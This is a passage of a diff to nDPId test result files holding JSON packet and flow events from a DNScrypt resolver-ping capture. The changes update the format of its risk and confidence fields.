AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":161,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305348,"pkt":"REREREREZmZmZmZmCABFAABQCgEAub0RuMAKAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":161,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":946739305349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305349,"pkt":"REREREREZmZmZmZmCABFAAIcCgJAAL0Rd6wKAAABlTjkLYMdAbsCCDw8f0UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":946739305349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305349,"pkt":"REREREREZmZmZmZmCABFAAXcCgMgAL0Rk+sKAAABlTjkLYmcAbsGBJVVf0IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":164,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305349,"pkt":"REREREREZmZmZmZmCABFAABQCgMAub0RuL4KAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":164,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":946739305349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":946739305349,"pkt":"ZmZmZmZmRERERERECABFAABHIUUAADsRmCqVcHAKCgAAASD7w3MAM2v+bACAAAABAAAAAAAAATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQ=="}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":946739305349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305349,"pkt":"REREREREZmZmZmZmCABFAAIcCgRAAL0Rd6oKAAABlTjkLeuNAbsCCDw8f0MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305349,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":946739305350,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":946739305350,"pkt":"ZmZmZmZmRERERERECABFAABHTCRAADsRLUuVcHAKCgAAASD7pkoAM4koa\/+AAAABAAAAAAAAATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQ=="}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":946739305351,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":946739305351,"pkt":"ZmZmZmZmRERERERECABFAABHTCNAADsRLUyVcHAKCgAAASD72tYAM1Sga\/uAAAABAAAAAAAAATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQ=="}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":946739305354,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":946739305354,"pkt":"ZmZmZmZmRERERERECABFAABHIUgAADsRmCeVcHAKCgAAASD72LoAM1a7a\/yAAAABAAAAAAAAATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQ=="}
@@ -363,26 +363,26 @@
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":946739305461,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739305461,"pkt":"ZmZmZmZmRERERERECABFAADUC54AADQRQFmVOOQtCgAAAQG7gx0AwELEf0WBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAIc+l9AAL0R9vsKAAABrGhdUMFoBaMCCMyOtDkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mAgAL0REzsKAAABrGhdUMbhBaMGBCsUtDYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA